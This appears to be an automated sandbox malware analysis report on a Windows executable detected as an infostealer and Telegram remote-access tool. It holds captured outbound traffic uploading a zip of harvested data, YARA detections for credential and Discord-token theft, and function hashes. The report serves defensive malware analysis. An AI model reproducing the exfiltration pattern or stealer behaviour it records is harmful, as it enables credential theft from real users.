2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 61 31 61 31 33 35 36 32 65 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 74 69 6e 61 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 31 33 38 37 32 37 5c 40 5b 55 6e 69 74 65 64 20 53 74 61 74 65 73 5d 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 4b 03 04 2d 00 01 00 08 00 4e 48 9f 59 4b 0f c0 e4 ff ff ff ff ff ff ff ff 0f 00 38 00 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 74 78 74 01 Data Ascii: --------------------------8dd2a1a13562e73Content-Disposition: form-data; name="document"; filename="C:\Users\user\AppData\Local\138727\@[United States].zip"Content-Type: application/x-ms-dos-executablePK-NHYK8Information.txt
2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: 02 bf ea 90 d2 a1 02 72 d6 8f 1c 9a 24 eb 8b b9 e9 71 97 c8 a8 a8 b2 fb 02 26 ba 2a 2b d6 a7 c1 25 2e 4b a6 65 07 f6 2e 31 ba ce ab f1 98 ec 42 8e 9f 65 24 59 2f 83 c2 f4 95 b0 d4 c7 8e fa 48 72 79 14 88 c3 df a1 72 1e 71 23 b0 fe 52 a5 20 3d 6f 51 46 fa 0c 10 fd 64 19 82 13 e7 3f 5c 59 35 b7 51 5f f3 4e 74 e8 12 e5 3f 1f 2a 1c 7e bd 09 6d 98 cc da ef b3 a1 b1 19 00 ac 4b d0 07 c4 c9 fe 59 73 9e a2 aa 3e 73 5b bd 1a 71 1e 14 8b 66 24 e3 14 06 a6 af 88 87 ae 23 96 28 60 c4 0b 67 e1 00 b4 1a 21 18 8c 8e d3 26 a0 6b 0c 10 e9 e3 1f 72 84 f5 6b 96 06 a5 ba c4 c3 c0 5a 25 a9 0a 77 f5 5a 0f 2e 90 64 fd a0 55 79 f7 00 7a 46 ca 43 ae 04 97 6c 00 88 72 18 6f 9e dc 25 7c f7 03 76 93 6c 05 e3 6c 8c 91 07 17 53 3c ee 8a 7f f1 5e 3a 9d dc c9 87 21 5a 44 ee 3b 02 10 89 Data Ascii: r$q&+%.Ke.1Be$Y/Hryrq#R =oQFd?\Y5Q_Nt?~mKYs>s[qf$#(`g!&krkZ%wZ.dUyzFClro%\|vllS<^:!ZD;
2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: 05 da 10 5d cf ea 1d ed ad 65 1d f0 bf 3e a9 85 1d 8e ab f8 71 f4 b7 57 34 ae 3b 2a 90 a0 ef 09 56 69 09 4e e6 e5 45 ac 31 f7 ca bc cd 65 3f 7f 34 f6 37 ee 25 7f fb 9b 38 52 ab 7a e9 96 c6 c3 07 39 ba 97 30 a3 aa 04 69 ea e8 94 97 18 41 39 a0 d9 59 ea c4 a6 ad ec 8c 42 8e a4 6e be ee 0f 34 26 95 0f 09 9c 61 05 fe f2 68 7c 3e a3 41 71 45 1e ec 2b 3d 38 5b 06 df 2c ce 73 2a 47 70 fb 27 92 d7 5c 6c 3c 22 7f f5 2d 5c 65 c8 e7 8e 1f 44 0c 08 16 a0 73 9e e3 b3 6a be 4f cd 27 a2 a8 e9 74 7f 42 19 10 69 00 ae a4 84 f0 78 33 c6 bb 68 ab b5 8e 57 0c dc f6 b1 ea 79 b9 27 7c 9e fc 8d 89 23 9c 61 87 ec 6a 10 55 8b f6 25 f9 91 c1 bb 78 a6 09 37 fd b7 70 81 7b a8 36 10 38 59 41 c5 5a f3 d3 dd 35 32 8b ff 48 7a dd d4 70 a7 83 33 c7 2d c6 38 9e 23 0c c1 b3 d4 d6 e4 eb 5d Data Ascii: ]e>qW4;ViNE1e?47%8Rz90iA9YBn4&ah\|>AqE+=8[,sGp'\l<"-\eDsjO'tBix3hWy'\|#ajU%x7p{68YAZ52Hzp3-8#]
2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: 4d 2b 76 d9 b2 d5 f8 0f 3e d3 cd 33 b9 6f bb fd d5 d0 1d db 07 c4 9b 03 b7 65 07 83 b9 0c 82 c1 2f 3e bc e7 31 c9 aa ac 30 74 51 15 ca 27 97 b2 b2 c9 95 43 08 6f ec ea 84 74 86 34 61 4e f3 fe 55 69 b0 e3 e3 69 26 52 fb 1d 96 0a cb 0c 2b 02 f6 b7 61 f3 13 7d 44 b4 16 4d c1 d3 e8 94 8c c6 85 6c 32 f9 77 f7 e6 35 73 7f 16 1c 6a 52 01 05 18 29 e0 c9 53 18 da c6 a4 aa ca 49 fc 13 0c 28 f4 92 e8 cf d4 e8 03 fe dc ca ad 54 ec 20 e8 47 c1 13 e9 6f a1 4e e8 58 0b 8d 1b 22 21 82 15 f7 7a 16 50 0c aa 66 c6 08 20 75 55 90 30 cf 34 eb 53 33 93 8a 6c e8 ad fd a8 ea b7 4b ee 10 d3 2e 7e 57 3b e6 63 f6 ff 8a 66 fa d2 e3 c9 6e df 41 e9 2e ac c4 68 4b c4 e0 f5 35 23 db 45 a9 55 43 16 f5 5d 59 8c 03 bd 9b 8f 6e 73 a8 c1 20 52 37 a7 84 b1 66 d5 75 4e a0 ad 21 a8 bb de 1e 70 Data Ascii: M+v>3oe/>10tQ'Cot4aNUii&R+a}DMl2w5sjR)SI(T GoNX"!zPf uU04S3lK.~W;cfnA.hK5#EUC]Yns R7fuN!p
2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: f6 08 67 f5 30 62 4d 83 bb cd 24 2d 29 74 5b c4 22 bb 60 2e a7 bc 92 d4 75 41 13 7c 51 6e 9a 50 5a 65 2d b6 c8 28 fe a0 70 dc e5 08 d6 69 1e dd 03 25 d2 e7 48 18 5a c4 97 70 36 d1 69 b3 50 ba 04 19 7b a7 0a 3d 39 4e bb c1 ae 42 15 5f de 36 7d 57 9a eb 78 f0 91 da a4 9e fc 8a a7 f1 57 fb 4c f0 96 4b c3 75 39 96 df f8 bf 73 73 f2 9b 4c 0b a7 8c 21 cb 6f 5d 84 54 4b 38 86 60 bd fa d6 8c 47 98 d5 8f b6 d3 6c a2 09 7f 3d 32 cd b6 8d 95 08 87 55 05 93 e0 6b b0 55 8f 13 4f c6 c2 63 af cb 95 21 85 f5 fd 0b e5 a7 8a c2 db ce ce cd 47 c5 d5 e0 84 24 fe 36 58 05 b3 a6 40 2d 71 24 78 f0 c1 56 c0 53 3b bb 49 e1 b2 d9 65 7b 75 1e 43 5f b6 b9 9b 0e 63 8e 50 88 92 f5 43 56 e5 24 aa 4c 73 eb c1 e4 94 84 d7 02 67 4c 33 3d a3 fa f9 df 07 4f d0 12 2c 46 94 b5 4d 56 38 aa e2 Data Ascii: g0bM$-)t["`.uA\|QnPZe-(pi%HZp6iP{=9NB_6}WxWLKu9ssL!o]TK8`Gl=2UkUOc!G$6X@-q$xVS;Ie{uC_cPCV$LsgL3=O,FMV8
2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: 00 58 bd 3f 2f bf 77 d1 d3 ad 54 42 7e 48 fc 5b 33 af e2 c8 64 b0 ba 6d d3 ec ec 1d d4 b4 ff 7f 88 c8 bc 94 a7 e3 bd 6f 20 d0 98 70 15 de 0e 0a ce 75 27 aa 20 e9 83 39 00 76 ba c6 30 a1 f5 df 03 d8 f2 f2 9c 66 75 16 89 1c 52 88 9d 91 df 34 df 45 6d 0b c3 27 5d 2d 71 dd 9e d9 87 30 f5 dc e1 26 22 7c 48 11 b4 10 54 b3 b9 36 fd 53 38 a8 1d 84 78 90 cf 6e 59 b4 57 fc 41 9f 42 c4 5c 0f 55 0f 0e 32 9c 0b 70 64 7d f6 88 be e5 83 ed 56 57 0f 82 06 16 40 c3 f2 b8 35 25 34 c2 bf 2b 01 81 3e 50 b8 96 a2 ac 85 1d b7 95 88 61 73 aa 10 79 98 09 ef a9 27 75 d8 52 18 90 e8 62 57 26 49 9c f1 e0 d6 a9 86 ed 28 64 aa cc 92 6d 81 7c 44 d2 eb ac 9f 2c 30 a3 55 6e 71 a5 4e 6b 17 b5 58 91 22 41 b5 cf 87 65 fd 81 90 9d f9 b3 e1 22 1d e1 02 e5 f3 de 86 69 eb 0c 02 4c 50 9c 6d 82 Data Ascii: X?/wTB~H[3dmo pu' 9v0fuR4Em']-q0&"\|HT6S8xnYWAB\U2pd}VW@5%4+>Pasy'uRbW&I(dm\|D,0UnqNkX"Ae"iLPm
2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: c2 15 cb 37 fa fd db 61 b2 15 2f e9 0d 32 52 ff ae 4f f8 28 d8 cf 01 2f af 07 b0 3b 33 80 79 d7 c8 16 c5 10 59 41 24 0c b3 65 4d 27 17 e7 4b 31 37 a1 69 5d c3 c4 fd 38 0d ae cb 90 1d 90 5f 32 bb 83 7f 17 0e d6 57 f1 ad 3d 4a a4 d4 58 00 5f 83 b4 05 c6 df fe 16 31 9a 74 d1 ad 1a 6e a9 0b cb a4 c3 04 5b e6 85 6d 99 dd cc 35 48 6c fe ca 4c a4 af 33 44 18 e1 53 46 94 1b c6 f9 e3 45 a1 2f a2 24 61 98 85 b3 40 64 1f 53 6e ad 23 b9 ff 51 39 20 7b 71 f6 84 d1 3a e7 f1 48 5c d4 2f 7b 4f b5 aa 22 a1 a1 f9 31 68 70 6f a2 ff 03 49 84 2e 26 ac 62 7e 4f d0 2f ea a8 44 af 38 57 0f 1f 32 f4 3c 7d ef 90 01 84 aa d5 33 0f 94 c5 82 46 50 f6 17 64 98 78 27 4b e8 ec 68 7b 92 6b bd 3c ed 25 47 06 09 2c cd 19 93 bd 90 df c8 63 4f d4 81 a4 8e d4 16 08 ec 6d 11 66 b3 9b 7a 6a 96 Data Ascii: 7a/2RO(/;3yYA$eM'K17i]8_2W=JX_1tn[m5HlL3DSFE/$a@dSn#Q9 {q:H\/{O"1hpoI.&b~O/D8W2<}3FPdx'Kh{k<%G,cOmfzj
2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: 8e 11 65 54 f8 63 1c fb cf b6 bd 7c ff 25 6f 8e 82 bf 5f 9b ae a4 e9 e8 99 ad 1a 90 24 ef d0 56 ec 2a 2b 80 c6 c5 ad fa 29 50 43 09 bc 33 49 ce c3 ad 4b 33 44 2f 25 cd c7 19 10 9d 1e e2 12 12 fa 0f ae 8c e8 e5 8c 79 d6 d7 0f cc 9c 71 25 7d b9 d0 5b 16 15 4e d9 17 a0 2e 8b 96 47 56 48 01 e6 39 b5 02 0b af ae 07 78 7f 87 6c 64 cf ec 64 25 f3 53 ad e5 98 85 76 c2 18 c0 c6 b8 b4 cf 97 04 b6 3a 77 1d 4c d2 75 9b da 2b 31 61 ba 9f dd 4b 61 25 06 be de c2 51 5f 29 a9 52 5e ef a0 01 e5 65 18 1c 41 05 27 39 a8 2b 00 d5 8f d7 5e 12 f1 d2 d6 b6 9a 30 d5 83 29 19 ce ab 98 59 14 85 29 f0 1f 2e 06 24 de ba 75 3b 1d 6d ac a3 5e 8d b0 f1 ab 34 71 f7 1b 48 de 31 75 e4 c3 6b fb 33 f8 72 96 de ea a3 2f 59 17 1b c6 b8 8b 94 97 88 18 e0 9f ae c0 d4 29 86 cc 94 b7 31 a1 b9 3b Data Ascii: eTc\|%o_$V*+)PC3IK3D/%yq%}[N.GVH9xldd%Sv:wLu+1aKa%Q_)R^eA'9+^0)Y).$u;m^4qH1uk3r/Y)1;
2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: 7e c3 91 74 72 d0 2d 3a 4a dd b4 52 13 dd 9e dd 48 a3 66 18 40 25 c5 03 7f 78 eb 04 dc d4 f8 93 3b d3 e2 f7 53 23 18 6e 2c ff 83 fa 20 e0 1b a1 36 91 05 cd 37 23 9b ad f7 60 7f 7f 5e 21 4d 96 9b 2c 28 1b 0a f6 0b 7c 33 43 c2 96 0d 17 67 ae b6 e7 d4 5b 43 5c 70 27 25 46 71 4b 2b 14 f3 72 be e7 75 5b 78 94 a0 9c b4 29 78 1c 08 96 3d ac 0b 87 b3 9b 5f 3f dc 9e e2 4b 49 33 db d5 82 40 f7 16 94 2d 70 91 d9 9a 99 87 48 11 d8 5f 9d bf 1a 04 05 3b da d2 c9 58 f5 4b 4c 7f 50 40 17 fb ad e2 d4 1c bd 3d e1 a7 18 9d 56 a0 f5 8f b1 d5 f8 67 96 27 12 f6 d5 62 1b 6f 04 d8 8e 43 fb 2c 48 17 6f ca 57 08 94 ac 82 20 85 65 b2 13 9d fe 52 00 40 fb 26 25 2d e2 84 ea e6 4a 58 4c 17 ca 3e 4c 44 1c 6b 83 17 e6 b0 30 11 ac f4 fa 3b 5e 25 84 72 f1 b2 02 62 a1 85 0b 7d e6 96 74 5e Data Ascii: ~tr-:JRHf@%x;S#n, 67#`^!M,(\|3Cg[C\p'%FqK+ru[x)x=_?KI3@-pH_;XKLP@=Vg'boC,HoW eR@&%-JXL>LDk0;^%rb}t^
2024-12-31 14:02:37 UTC	16355	OUT	Data Raw: 36 19 64 47 fe a9 59 9d 56 d3 be 3b 44 3f 6b dd c7 01 81 a3 53 6b df b0 4d d7 ec 26 67 91 45 d8 2e 88 41 63 6f 01 39 8b 5e 14 33 1c e8 f0 45 33 d0 1f 3c 49 c7 66 8f ab 56 b3 a7 25 76 89 09 b2 d9 84 31 f4 15 13 b6 4b 5d 9a b7 d4 0c f1 aa b7 59 5e 4a e0 67 b2 1a 86 73 99 ba 8f 89 f5 01 4c be 71 5c 5c e6 d6 ec 9a da 87 9a 6f a8 7a 1e 27 01 8e 7b ff 2a b3 2a bf 56 43 c9 d1 6e 05 87 35 d2 39 8d de 8a 46 68 6d b3 a2 f4 af fc ff d0 9d 18 4f 33 5c 1f ee b4 c1 b8 6e 46 2e 7f f3 05 bd b3 66 28 0f 5b a4 44 d3 5d 70 c8 85 c5 24 05 87 b9 30 60 22 c3 20 a9 b7 89 33 f8 92 e6 0b 61 81 68 bb 31 84 72 1c b6 28 86 fb 03 a9 ac f3 63 25 c5 b2 1d 99 d8 df 1e 12 bc 6b 5c 31 bd d2 45 31 a5 4e 87 bd e6 17 a9 5b 7c b6 75 fc 00 bd e1 9b bc a3 61 c0 e9 f2 da b0 3b ee a5 24 54 02 14 Data Ascii: 6dGYV;D?kSkM&gE.Aco9^3E3<IfV%v1K]Y^JgsLq\\oz'{**VCn59FhmO3\nF.f([D]p$0`" 3ah1r(c%k\1E1N[\|ua;$T
2024-12-31 14:02:38 UTC	419	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Tue, 31 Dec 2024 14:02:38 GMT Content-Type: application/json Content-Length: 73 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Bad Request: chat not found"}

Target ID:	0
Start time:	09:02:20
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\vEtDFkAZjO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\vEtDFkAZjO.exe"
Imagebase:	0x760000
File size:	327'680 bytes
MD5 hash:	1B8DAC31EB30BD909FADCD9738C832CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	40%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Executed Functions

Function 013247B8 Relevance: 3.5, Strings: 2, Instructions: 973COMMON

Download Yara Rule

Strings

-, xrefs: 01324A81
c, xrefs: 01324DE4

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID: -$c
API String ID: 0-3934772709
Opcode ID: 7bd8f1bb70289767b90a594abe602110db063ffffaa232b775ae1468f30f792e
Instruction ID: 5c173655986a88b47b67d86d66bf8a21b2dd678e2d13bd9fafe3edfacc05a318
Opcode Fuzzy Hash: 7bd8f1bb70289767b90a594abe602110db063ffffaa232b775ae1468f30f792e
Instruction Fuzzy Hash: D9B2A075E002298FDB24DF68C985BEDBBB1BB49315F1481E9D908A7356C734AE81CF90

Function 0132BE02 Relevance: 2.0, Strings: 1, Instructions: 760
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 0132C123

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 258ffddf9800d18d463a26e32baef3f5780413bcb5a30f2870b06dd5834af74d
Instruction ID: 5f88d78db70a689d71c08e22356d81c864df46bcf4ec5426b7d1ad888c99be83
Opcode Fuzzy Hash: 258ffddf9800d18d463a26e32baef3f5780413bcb5a30f2870b06dd5834af74d
Instruction Fuzzy Hash: 2E82BF74A00268CFDB64DF69C884B9DBBF1BB48314F1495AAD40DAB252D734AEC8CF50

Function 01013C98 Relevance: 1.8, APIs: 1, Instructions: 348
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01013DCE

Memory Dump Source

Source File: 00000000.00000002.1611908505.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1010000_vEtDFkAZjO.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67b3b62cb5e1cca2721f19590154926ce5000e2e01a4c7c4809f66e994cf7b64
Instruction ID: d3f94b66a2c240a38b8c573c3643e65dd49c19d54919d9d725fa523b6eaea87b
Opcode Fuzzy Hash: 67b3b62cb5e1cca2721f19590154926ce5000e2e01a4c7c4809f66e994cf7b64
Instruction Fuzzy Hash: 3BF1A374E00228CFEB64DFA9D884B9DBBB2BF89301F1081AAD849A7355DB355D85CF50

Function 01332EEF Relevance: 1.6, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<, xrefs: 01333291

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 8ffe3a9f6d8fbb72d44e378a930e74ebd0f4698dd4767221aa2c9f3cfd43351c
Instruction ID: a1b91a00c341808d30a39fec6730794f9953a00bf8694a99f602d308a53f138c
Opcode Fuzzy Hash: 8ffe3a9f6d8fbb72d44e378a930e74ebd0f4698dd4767221aa2c9f3cfd43351c
Instruction Fuzzy Hash: A4F1B274E01228DFDB25DFA8C994BDDBBB2BF48314F1081A9E509A7250DB319E85CF10

Function 013312D8 Relevance: 1.2, Instructions: 1234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab87c8c1d9fa44621b61586aa2f7a80f7ddb0ed90a216fb9d6af9da5954ea113
Instruction ID: 933d8105dc5c0216c19ec50119bd48b275637335dc90d0e42745cb8586a261b8
Opcode Fuzzy Hash: ab87c8c1d9fa44621b61586aa2f7a80f7ddb0ed90a216fb9d6af9da5954ea113
Instruction Fuzzy Hash: 8DD2B375A002698FDB64DF68C984BEDBBF2BB49305F1581EAD908A7352C7349E80CF54

Function 0101EB48 Relevance: 1.0, Instructions: 967COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611908505.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1010000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d21309bcfd6bbb0e7af50c6a2c82d98a0b8b877c11ab8847714852a4362d313c
Instruction ID: 861fe5323d236fc4bdda4ad7fd3bd716eef00d72ef6b8b5371b35b09cb6fa6ea
Opcode Fuzzy Hash: d21309bcfd6bbb0e7af50c6a2c82d98a0b8b877c11ab8847714852a4362d313c
Instruction Fuzzy Hash: 2FA2B374A00229CFDB64DF68C984BDDBBB2BF48310F5481A9D948AB355DB34AE85CF50

Function 0132CAA1 Relevance: .5, Instructions: 541
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1c2c50d2bfe7bf0c409c4d1808ae9a5eb6916eb101a90eeaca8c34251ff25ed
Instruction ID: 6d2b83bdbc0a6769fc060b59a2a97f5591568a9431ca5379692644d825eb3455
Opcode Fuzzy Hash: d1c2c50d2bfe7bf0c409c4d1808ae9a5eb6916eb101a90eeaca8c34251ff25ed
Instruction Fuzzy Hash: 5442D274A01229CFEB24DF68C984FA9BBF1BF48315F1582E5D408A7292D734AE85CF50

Function 0132EE00 Relevance: .4, Instructions: 448
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb7e8969309e8dfe476aa1c2294efb67876cc0302b44630f17dfb4c7e1da4db5
Instruction ID: 37f5842396d580a94c48307d05c45aaad54efae398ae23d53d0b742a680c96ba
Opcode Fuzzy Hash: fb7e8969309e8dfe476aa1c2294efb67876cc0302b44630f17dfb4c7e1da4db5
Instruction Fuzzy Hash: 4B22AD74E002198FCB14DFA9C584A9EFBF2BF49315F2581A9E818AB315D731AD81CF94

Function 01320040 Relevance: .4, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd6221e3c87c916c82cfec13ab25ef84d0565aa2cb5adc5edf9c942a33d160a
Instruction ID: 47031458affd9d80ecc3b55ae63c7e28c261cfc9e5e45107fe9c8661dcdec783
Opcode Fuzzy Hash: dcd6221e3c87c916c82cfec13ab25ef84d0565aa2cb5adc5edf9c942a33d160a
Instruction Fuzzy Hash: A522B074D05228CFEB64DF69C884BEDBBB2BB49305F1081E9E449A7351DB349A85CF60

Function 01016CD8 Relevance: .4, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1611908505.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1010000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a8fda8cfd8329baf1c738cfc2748e256c48e4c487ebf542ef0a63424131e0c
Instruction ID: 07f314f569026283e6fcf8d23235f8d83097774c2e45d591d7cd1e191d48c8b4
Opcode Fuzzy Hash: 07a8fda8cfd8329baf1c738cfc2748e256c48e4c487ebf542ef0a63424131e0c
Instruction Fuzzy Hash: 23124575E04269CFCB64DFA9D894BDDBBB2BF49300F1481AAC448AB255EB345D82CF50

Function 01325858 Relevance: .4, Instructions: 365
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c97173be9d6784ef1bab48f73408418ee303f33de4d62ca0a4b0ef58de8c15c
Instruction ID: d0eb11bb99bfb48b5b3e0c3f3c3845cb8012c9933d0da9fdadc0ab4da65f361d
Opcode Fuzzy Hash: 7c97173be9d6784ef1bab48f73408418ee303f33de4d62ca0a4b0ef58de8c15c
Instruction Fuzzy Hash: 0C025B78E00258CFDB54DFA9C984A9DBBF2BF49304F1481A9D409AB365DB34AE85CF50

Function 01323DD0 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a022553e3549460e8a425c565c84fd23a6be9912090923c7b1ad70fca32b3be7
Instruction ID: 8ce16e5eea4b3cc6d8f269c527288e8c262d3be8e1df28b39dd1c9b4eb404976
Opcode Fuzzy Hash: a022553e3549460e8a425c565c84fd23a6be9912090923c7b1ad70fca32b3be7
Instruction Fuzzy Hash: E4F1DE74901228CFDB24DF69C894BDDBBF2BF4A304F1480E9D549A72A1D7759A84CF50

Function 013229BA Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe259610ad7557504fceaa497c3eaa9418504c34d2ca52c0a0b1723326ff369
Instruction ID: bb055824f6f840bc1658781cf7d8ad72fd9a44716c8c208101dc0d8777fa8bec
Opcode Fuzzy Hash: efe259610ad7557504fceaa497c3eaa9418504c34d2ca52c0a0b1723326ff369
Instruction Fuzzy Hash: 88F1E174904229CFDB28DF65C988BEEBBB2BF49305F1080E9D509A72A0DB745E85DF50

Function 059656A8 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1618614493.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5960000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
